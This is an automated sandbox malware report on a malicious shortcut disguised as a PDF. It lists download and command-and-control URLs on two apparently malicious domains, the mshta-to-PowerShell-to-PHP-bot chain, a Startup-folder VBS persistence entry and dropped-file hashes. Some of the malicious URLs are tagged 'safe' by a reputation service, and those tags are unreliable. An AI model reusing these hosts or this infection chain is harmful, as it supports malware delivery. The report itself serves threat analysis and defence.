                              high
                              https://myfilebuilders.com/sammGmshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.ver)svchost.exe, 00000006.00000002.2897591888.000001B97E600000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://myfilebuilders.com/sammLmshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.com/Professional_Socipowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.com/sammRmshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.compowershell.exe, 00000007.00000002.1757475272.000001F40D71C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.com/Ppowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.com/Professional_Social_Media_powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.com/samm-0mshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.com/sammPpowershell.exe, 00000004.00000002.1653965522.000002A9CB6D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.php.netDtar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php_pdo_mysql.dll.21.dr, php_sysvshm.dll.21.dr, php_mysqli.dll.21.dr, php_zend_test.dll.21.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://myfilebuilders.com/php_bot_downloadpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://myfilebuilders.com/php_bot_dowpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://bugs.php.net/report.phptar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://myfilebuilders.com/php_bot_downloadepowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://myfilebuilders.com/php_powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.php.netphp.exefalse
                                    high
                                    https://myfilebuilders.com/Professionpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://myfilebuilders.com/php_botpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://myfilebuilders.com/sammamshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://rodgersluciecassy.com/mbpphp.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://myfilebuilders.com/samm;.WSF;.WSH;.MSpowershell.exe, 00000004.00000002.1653812581.000002A9CB6C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://myfilebuilders.cpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://myfilebuilders.com/sammjmshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://myfilebuilders.com/sammhpowershell.exe, 00000004.00000002.1654335033.000002A9CDA0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://rodgersluciecassy.com/mbp/apit.php?aid=2&mid=PKJ2RMXRS481H4NV6VCC978Z30rphp.exe, 00000018.00000002.2893070291.000001E12DC57000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://myfilebuilders.com/Professional_Social_Media_Report.pdfpowershell.exe, 00000007.00000002.1757475272.000001F40BCDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://myfilebuilders.com/Professionalpowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://myfilebuilders.copowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://rodgersluciecassy.com/mbp/down/php.exe, 0000001C.00000002.2892874564.0000014E5D471000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/php/php-src/issuesbeforephp.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpfalse
                                        high
                                        https://myfilebuilders.com/ppowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://myfilebuilders.com/sammppowershell.exe, 00000004.00000002.1654335033.000002A9CD561000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://myfilebuilders.com/sammomshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://myfilebuilders.compowershell.exe, 00000007.00000002.1757475272.000001F40D777000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://myfilebuilders.com/samm$global:?powershell.exefalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://myfilebuilders.com/Professional_Social_Medipowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://myfilebuilders.com/samm~mshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://myfilebuilders.com/php_bot_downloader_v2-AVERAGEpowershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://myfilebuilders.com/Professipowershell.exe, 00000007.00000002.1757475272.000001F40D365000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/Licensepowershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://myfilebuilders.com/php_bot_downloader_v2-powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
213.139.205.247 | unknown | Netherlands | 136175 | SERVERHOSH-AS-APServerhoshInternetServiceNL | false
104.21.2.79 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                              IP
                                              127.0.0.1
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1584384
                                              Start date and time:2025-01-05 10:43:07 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 8m 14s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:30
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:HateSpeech2024_Summary.pdf.lnk.bin.lnk
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winLNK@45/150@0/3
                                              EGA Information:
                                              • Successful, ratio: 40%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .lnk
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 23.56.252.213, 2.16.168.107, 2.16.168.105, 3.219.243.226, 52.22.41.97, 52.6.155.20, 3.233.129.217, 172.64.41.3, 162.159.61.3, 23.209.209.135, 23.219.161.132, 192.168.2.4, 4.175.87.197, 104.77.220.172, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
• Execution Graph export aborted for target mshta.exe, PID 7872 because there are no executed functions
                                              • Execution Graph export aborted for target powershell.exe, PID 7788 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 8032 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:43:54 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
04:43:57 | API Interceptor | 2x Sleep call for process: svchost.exe modified
04:43:59 | API Interceptor | 1x Sleep call for process: mshta.exe modified
04:43:59 | API Interceptor | 30x Sleep call for process: powershell.exe modified
04:44:16 | API Interceptor | 1x Sleep call for process: AcroCEF.exe modified
04:44:45 | API Interceptor | 58x Sleep call for process: php.exe modified
09:44:41 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs
                                              No context
                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SERVERHOSH-AS-APServerhoshInternetServiceNL | Uundgaaelige.exe | malicious | Remcos, GuLoader | 209.90.237.48
 | ORDERDATASHEET#PO8738763.scr.exe | malicious | AgentTesla, RedLine, SugarDump, XWorm | 209.90.234.57
 | Palmebladstag.exe | malicious | Remcos, GuLoader | 209.90.234.58
 | 01-05-24 remittance.exe | malicious | GuLoader | 209.90.233.2
 | 87tBuE42ft.exe | malicious | Remcos, GuLoader | 209.90.234.20
 | http://213.139.205.131/update_ver | malicious | Unknown | 213.139.205.131
 | http://213.139.205.131/w_ver.dat | malicious | Unknown | 213.139.205.131
 | http://213.139.205.131/update_ver | malicious | Unknown | 213.139.205.131
 | ReleaseEvans#27.docm | malicious | Unknown | 213.139.205.131
 | Application#89.docm | malicious | Unknown | 213.139.205.131
CLOUDFLARENETUS | paint.exe | malicious | Blank Grabber | 162.159.137.232
 | K27Yg4V48M.exe | malicious | LummaC | 104.21.56.70
 | hkMUtKbCqV.exe | malicious | Unknown | 162.159.135.234
 | IH5XqCdf06.exe | malicious | LummaC | 104.21.56.70
 | 3LcZO15oTC.exe | malicious | Unknown | 104.21.43.44
 | 3jL3mqtjCn.exe | malicious | LummaC | 104.21.48.1
 | 3LcZO15oTC.exe | malicious | Unknown | 172.67.219.93
 | elyho3x5zz.exe | malicious | Unknown | 188.114.96.3
 | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | malicious | Remcos | 172.64.41.3
 | elyho3x5zz.exe | malicious | Unknown | 188.114.96.3
                                              No context
                                              No context
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):1.3073576467741839
                                              Encrypted:false
                                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrT:KooCEYhgYEL0In
                                              MD5:90546F94982D0DB6586D69454A4DACD2
                                              SHA1:B68AD7643C245E51933CA9A31ADE9AE7D8A88623
                                              SHA-256:2C356B408C20CF10FE3C64574D514953DF0DAAD09DABBB289685EF60781B0058
                                              SHA-512:EBBA1B515BB22082F9C443A0DD9FFBC942FFF0B07B1FBCF804706FABFECDAECBD3B2D26DF83102E7D54DDE7CBAB384D49E317BBE835A94EF97E5CEE7ED2F5C28
                                              Malicious:false
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x452bc915, page size 16384, DirtyShutdown, Windows version 10.0
                                              Category:dropped
                                              Size (bytes):1310720
                                              Entropy (8bit):0.42213589454282485
                                              Encrypted:false
                                              SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                              MD5:8F1988D05D55FBA8619E5CA78D0F1A7C
                                              SHA1:C37BFAEFFE93515243609DE952349DA4556A861C
                                              SHA-256:18CD810C6E917C37E0B6DDB9F1DD7F4B872B85318FBD9DEA6919925CB4D121AF
                                              SHA-512:19524C9716D9F96CBAA72B44E5B9B050647EB9A5338E88731156B8999192209E61C8AA5B1B6F5E074F269627C58F91EE30306D00E9D67A4EB2B3509FDA1C0734
                                              Malicious:false
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.0765327378974397
                                              Encrypted:false
                                              SSDEEP:3:IVtllKYer8+ajn13a/M18RYllollcVO/lnlZMxZNQl:IVtllKzr9a53qMayAOewk
                                              MD5:4650E580CC6EC59153A925671D47D7A5
                                              SHA1:0B6A2B8746D31CAD590F1CB5C39CC66C0B778A29
                                              SHA-256:4C8FC6B636AF2D0C6FFEB3A54B7DEE0E5C6A5168403EADEF2F76ADDF689BA973
                                              SHA-512:7A5974A087FAA74B2987D494EE80CDCFDEB3E3C85D0F92F55B5D33B424AD8A69D969EED4FDDF48ADAD5382181AD3F6B465E183B4A1A7BA4393DA33005BF965BB
                                              Malicious:false
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.2492844377201155
                                              Encrypted:false
                                              SSDEEP:6:iOH1iL3X9+q2Pwkn2nKuAl9OmbnIFUtt1iL0ZmwD1iLUVkwOwkn2nKuAl9OmbjLJ:7E4vYfHAahFUtl/l5JfHAaSJ
                                              MD5:1217DE6C978816F35D30B8FD33E65271
                                              SHA1:4CC54B1765E2885D7CE85AE2C810129694022C07
                                              SHA-256:EDF9D15B9038BC9A7BDD74448A869557E30C803979E70BEB8D82E5F59E1E7949
                                              SHA-512:350431050E543A1F7A534E1A41A64D9FB868CA2FCEA85BB5EC41ECD8C2E2CDC8B31B408D73A95A1E17F83FE659C35ED5F6BC64534EA76B7DFB0428BBAC5DC87A
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.393 b78 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-04:44:03.396 b78 Recovering log #3.2025/01/05-04:44:03.396 b78 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):289
                                              Entropy (8bit):5.2492844377201155
                                              Encrypted:false
                                              SSDEEP:6:iOH1iL3X9+q2Pwkn2nKuAl9OmbnIFUtt1iL0ZmwD1iLUVkwOwkn2nKuAl9OmbjLJ:7E4vYfHAahFUtl/l5JfHAaSJ
                                              MD5:1217DE6C978816F35D30B8FD33E65271
                                              SHA1:4CC54B1765E2885D7CE85AE2C810129694022C07
                                              SHA-256:EDF9D15B9038BC9A7BDD74448A869557E30C803979E70BEB8D82E5F59E1E7949
                                              SHA-512:350431050E543A1F7A534E1A41A64D9FB868CA2FCEA85BB5EC41ECD8C2E2CDC8B31B408D73A95A1E17F83FE659C35ED5F6BC64534EA76B7DFB0428BBAC5DC87A
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.393 b78 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/05-04:44:03.396 b78 Recovering log #3.2025/01/05-04:44:03.396 b78 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):336
                                              Entropy (8bit):5.1739326793609965
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLB3+q2Pwkn2nKuAl9Ombzo2jMGIFUtt1iLhGZmwD1iL8s3VkwOwkn2nKuAv:7tvYfHAa8uFUtL/lsF5JfHAa8RJ
                                              MD5:5FC555F8197C5FFD1C7D08549467649B
                                              SHA1:164C4472D4F29A250A789BE5F8CA9930E69FC77E
                                              SHA-256:85313BC0307AA99FC948823182A19F35D9122FA327DAB1E6792C96A75EDA3844
                                              SHA-512:F8FAF737B8EAA5369FF19F993CF5C8DABC2BD9EBC115B9FF1C621139BB0936FFD47ACAAF9CF54323EA2FB8CCEA4D91B343E78BE706C38FB0ABF7151F1D506AF2
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.499 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-04:44:03.500 1d98 Recovering log #3.2025/01/05-04:44:03.501 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):336
                                              Entropy (8bit):5.1739326793609965
                                              Encrypted:false
                                              SSDEEP:6:iOH1iLB3+q2Pwkn2nKuAl9Ombzo2jMGIFUtt1iLhGZmwD1iL8s3VkwOwkn2nKuAv:7tvYfHAa8uFUtL/lsF5JfHAa8RJ
                                              MD5:5FC555F8197C5FFD1C7D08549467649B
                                              SHA1:164C4472D4F29A250A789BE5F8CA9930E69FC77E
                                              SHA-256:85313BC0307AA99FC948823182A19F35D9122FA327DAB1E6792C96A75EDA3844
                                              SHA-512:F8FAF737B8EAA5369FF19F993CF5C8DABC2BD9EBC115B9FF1C621139BB0936FFD47ACAAF9CF54323EA2FB8CCEA4D91B343E78BE706C38FB0ABF7151F1D506AF2
                                              Malicious:false
                                              Preview:2025/01/05-04:44:03.499 1d98 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/05-04:44:03.500 1d98 Recovering log #3.2025/01/05-04:44:03.501 1d98 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):475
                                              Entropy (8bit):4.9707925746743955
                                              Encrypted:false
                                              SSDEEP:12:YH/um3RA8sqxVksBdOg2Hnfcaq3QYiubInP7E4T3y:Y2sRdsK/dMHu3QYhbG7nby
                                              MD5:9A5E5E5DB5269B629C54B0D88ED4F9A7
                                              SHA1:3F8D3E8F28B23A6B35794C01CDCCFA30665C3992
                                              SHA-256:9C9FDF850473DB83CF846F16B6D889ABECB6612B5CAF047FD982A650D41591FC
                                              SHA-512:B2293EBD3B554697667E9F2D9722C7BA93CB7D71AEE0B6459B6EAF6BC01F65DCCDD07DDA0DE2934FAAB45370455897911B60AAC12505A2335AE74D3AA50A1063
                                              Malicious:false
                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380630255579843","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":122642},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:JSON data
                                              Category:modified
                                              Size (bytes):475
                                              Entropy (8bit):4.9707925746743955
                                              Encrypted:false
                                              SSDEEP:12:YH/um3RA8sqxVksBdOg2Hnfcaq3QYiubInP7E4T3y:Y2sRdsK/dMHu3QYhbG7nby
                                              MD5:9A5E5E5DB5269B629C54B0D88ED4F9A7
                                              SHA1:3F8D3E8F28B23A6B35794C01CDCCFA30665C3992
                                              SHA-256:9C9FDF850473DB83CF846F16B6D889ABECB6612B5CAF047FD982A650D41591FC
                                              SHA-512:B2293EBD3B554697667E9F2D9722C7BA93CB7D71AEE0B6459B6EAF6BC01F65DCCDD07DDA0DE2934FAAB45370455897911B60AAC12505A2335AE74D3AA50A1063
                                              Malicious:false
                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380630255579843","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":122642},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4320
                                              Entropy (8bit):5.258104955828006
                                              Encrypted:false
                                              SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo702xBjnJ:etJCV4FiN/jTN/2r8Mta02fEhgO73goD
                                              MD5:545C1177026501417634A01268AE9409
                                              SHA1:66D5AB31B2343127668A39BD160EF121CC471F70
                                              SHA-256:BC8FAD3F6C41A79A0B11CC9A83F264813AEFCB25BD920B2814CEA299C9AF2500
                                              SHA-512:47F58B190FA9BAEDCBD1871B8CB01CE44E819139065B360C4BF434C6BD4C5432D0F8ADF3348C248A24067ADDD7572803D9878B0A2A79FA31C4E4EF4B4953A17A
                                              Malicious:false
                                              Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):324
